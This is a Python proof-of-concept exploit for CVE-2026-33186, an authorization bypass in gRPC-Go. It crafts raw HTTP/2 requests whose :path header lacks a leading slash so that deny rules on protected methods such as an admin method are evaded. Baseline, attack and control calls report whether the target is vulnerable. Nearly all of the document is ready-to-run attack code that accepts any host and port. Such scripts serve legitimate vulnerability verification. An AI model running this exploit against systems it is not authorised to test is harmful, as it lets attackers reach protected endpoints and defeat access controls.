#!/usr/bin/env python3 """ CVE-2026-33186 gRPC-Go authorization policy bypass via missing leading slash Requirements: pip install h2 (pure-Python HTTP/2 implementation) Python >= 3.8 Usage: python3 poc.py [--host HOST] [--port PORT] [--service SVC] [--method MTH] python3 poc.py --help """ import argparse import socket import struct import sys import time try: import h2.config import h2.connection import h2.events except ImportError: print("[!] h2 library not found. Install with: pip install h2") sys.exit(1) def encode_grpc_frame(data: bytes) -> bytes: """Encode payload as a gRPC data frame: 1-byte compressed flag + 4-byte length.""" return b"\x00" + struct.pack(">I", len(data)) + data def decode_grpc_frame(data: bytes) -> bytes: """Strip 5-byte gRPC data frame header and return payload.""" if len(data) < 5: return data _compressed = data[0] _length = struct.unpack(">I", data[1:5])[0] return data[5:] def decode_proto_string(data: bytes) -> str: """Decode field 1 (wire type 2) from a minimal protobuf message.""" if len(data) < 2 or data[0] != 0x0A: # field 1, wire type 2 return f"" length = data[1] if len(data) < 2 + length: return f"" return data[2:2 + length].decode("utf-8", errors="replace") def encode_proto_string(s: str) -> bytes: """Encode a string as field 1 (wire type 2) in a protobuf message.""" encoded = s.encode("utf-8") length = len(encoded) # varint-encode the length (simple single-byte for short strings) assert length < 128, "use varint for longer strings" return bytes([0x0A, length]) + encoded def send_grpc_call(host: str, port: int, path: str, payload: bytes, label: str) -> dict: """ Send a single gRPC call using a raw HTTP/2 connection. path -- the :path pseudo-header value to send (may or may not have leading /) payload -- serialized protobuf request body label -- human-readable label for logging """ print(f"\n{'='*60}") print(f" Call: {label}") print(f" :path header = {path!r}") print(f"{'='*60}") sock = socket.create_connection((host, port), timeout=5) config = h2.config.H2Configuration( client_side=True, header_encoding="utf-8", ) conn = h2.connection.H2Connection(config=config) conn.initiate_connection() # Send connection preface data = conn.data_to_send(65535) sock.sendall(data) # Read server preface (SETTINGS frame) raw = sock.recv(65535) events = conn.receive_data(raw) for ev in events: if isinstance(ev, h2.events.SettingsAcknowledged): pass elif isinstance(ev, h2.events.WindowUpdated): pass # ACK server settings data = conn.data_to_send(65535) if data: sock.sendall(data) # Build gRPC request grpc_body = encode_grpc_frame(payload) # HEADERS frame with gRPC pseudo-headers # The key attack: :path does NOT start with '/' headers = [ (":method", "POST"), (":scheme", "http"), (":path", path), # <-- attacker-controlled :path (":authority", f"{host}:{port}"), ("content-type", "application/grpc"), ("te", "trailers"), ("grpc-encoding", "identity"), ("user-agent", "poc-cve-2026-33186/1.0"), ] stream_id = conn.get_next_available_stream_id() conn.send_headers(stream_id, headers) data = conn.data_to_send(65535) sock.sendall(data) # DATA frame with END_STREAM conn.send_data(stream_id, grpc_body, end_stream=True) data = conn.data_to_send(65535) sock.sendall(data) # Read response result = { "grpc_status": None, "grpc_message": None, "response_body": None, "raw_body": b"", } deadline = time.time() + 5.0 while time.time() < deadline: try: sock.settimeout(2.0) raw = sock.recv(65535) except socket.timeout: break if not raw: break events = conn.receive_data(raw) data = conn.data_to_send(65535) if data: sock.sendall(data) for ev in events: if isinstance(ev, h2.events.DataReceived): result["raw_body"] += ev.data conn.acknowledge_received_data(ev.flow_controlled_length, ev.stream_id) data = conn.data_to_send(65535) if data: sock.sendall(data) elif isinstance(ev, h2.events.TrailersReceived): for name, value in ev.headers: if name == "grpc-status": result["grpc_status"] = int(value) elif name == "grpc-message": result["grpc_message"] = value elif isinstance(ev, h2.events.ResponseReceived): for name, value in ev.headers: if name == "grpc-status": result["grpc_status"] = int(value) elif name == "grpc-message": result["grpc_message"] = value elif isinstance(ev, h2.events.StreamEnded): deadline = 0 # done conn.close_connection() data = conn.data_to_send(65535) if data: try: sock.sendall(data) except Exception: pass sock.close() # Decode response body if result["raw_body"]: payload_bytes = decode_grpc_frame(result["raw_body"]) result["response_body"] = decode_proto_string(payload_bytes) # Print result status = result["grpc_status"] status_names = {0: "OK", 1: "Cancelled", 2: "Unknown", 3: "InvalidArgument", 5: "NotFound", 7: "PermissionDenied", 12: "Unimplemented", 13: "Internal"} status_name = status_names.get(status, str(status)) print(f" gRPC status: {status} ({status_name})") if result["grpc_message"]: print(f" gRPC message: {result['grpc_message']}") if result["response_body"]: print(f" Response: {result['response_body']}") return result def main(): parser = argparse.ArgumentParser( description="CVE-2026-33186 PoC -- gRPC-Go authz bypass via :path without leading slash", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=( "Examples:\n" " python3 poc.py\n" " python3 poc.py --host 10.0.0.5 --port 50051\n" " python3 poc.py --service MyService --method SecretMethod\n" "\n" "The PoC runs three calls to isolate the bypass:\n" " BASELINE -- canonical :path with slash, expect PermissionDenied (7)\n" " ATTACK -- :path without slash, expect OK (0) on vulnerable server\n" " CONTROL -- public method with slash, expect OK (0)\n" "\n" "Exit codes: 0=vulnerable, 1=patched, 2=error\n" "Requires: pip install h2" ), ) parser.add_argument("--host", default="127.0.0.1", help="gRPC server host (default: 127.0.0.1)") parser.add_argument("--port", type=int, default=50051, help="gRPC server port (default: 50051)") parser.add_argument("--service", default="TestService", help="gRPC service name to target (default: TestService)") parser.add_argument("--method", default="AdminMethod", help="gRPC method name to bypass (default: AdminMethod)") parser.add_argument("--public-method", default="PublicMethod", dest="public_method", help="method name for control call (default: PublicMethod)") args = parser.parse_args() admin_path = f"/{args.service}/{args.method}" attack_path = f"{args.service}/{args.method}" public_path = f"/{args.service}/{args.public_method}" print() print("CVE-2026-33186 -- gRPC-Go Authorization Policy Bypass") print("Affected: google.golang.org/grpc < v1.79.3") print("Fixed in: v1.79.3 (PR #8981, 2026-03-17)") print() print(f"Target: {args.host}:{args.port}") print() print("Policy under test:") print(f" DENY {admin_path} <- deny rule (with slash)") print(f" ALLOW {public_path}") print(" ALLOW * (default)") # Protobuf request: field 1 = "poc" req_payload = encode_proto_string("poc") # ----------------------------------------------------------------------- # Test 1: Normal path WITH leading slash -> should be DENIED (status 7) # ----------------------------------------------------------------------- r1 = send_grpc_call( args.host, args.port, path=admin_path, payload=req_payload, label=f"BASELINE: {admin_path} (WITH slash) -- expect DENIED", ) # ----------------------------------------------------------------------- # Test 2: Bypass path WITHOUT leading slash -> should bypass deny rule # ----------------------------------------------------------------------- r2 = send_grpc_call( args.host, args.port, path=attack_path, payload=req_payload, label=f"ATTACK: {attack_path} (NO slash) -- expect BYPASS", ) # ----------------------------------------------------------------------- # Test 3: Public method (control -- should always succeed) # ----------------------------------------------------------------------- r3 = send_grpc_call( args.host, args.port, path=public_path, payload=req_payload, label=f"CONTROL: {public_path} (WITH slash) -- expect OK", ) # ----------------------------------------------------------------------- # Summary # ----------------------------------------------------------------------- print() print("=" * 60) print("SUMMARY") print("=" * 60) baseline_denied = r1["grpc_status"] == 7 bypass_succeeded = r2["grpc_status"] == 0 public_ok = r3["grpc_status"] == 0 print(f" Baseline {admin_path} (with slash): status={r1['grpc_status']} " f"{'DENIED (correct)' if baseline_denied else 'UNEXPECTED'}") print(f" Attack {attack_path} (no slash): status={r2['grpc_status']} " f"{'BYPASS CONFIRMED' if bypass_succeeded else 'not bypassed'}") print(f" Control {public_path}: status={r3['grpc_status']} " f"{'OK (correct)' if public_ok else 'UNEXPECTED'}") print() if baseline_denied and bypass_succeeded: print(" [VULNERABLE] CVE-2026-33186 confirmed on this server.") print(" The deny rule is enforced for normal clients but bypassed") print(" by omitting the leading slash from the :path header.") sys.exit(0) elif not baseline_denied: print(f" [ERROR] Baseline not denied (status={r1['grpc_status']}).") print(" Check that the server is running and authz policy is configured.") sys.exit(2) else: print(f" [PATCHED] Bypass returned status={r2['grpc_status']}.") print(" This server may be running grpc-go >= v1.79.3 (patched).") sys.exit(1) if __name__ == "__main__": main()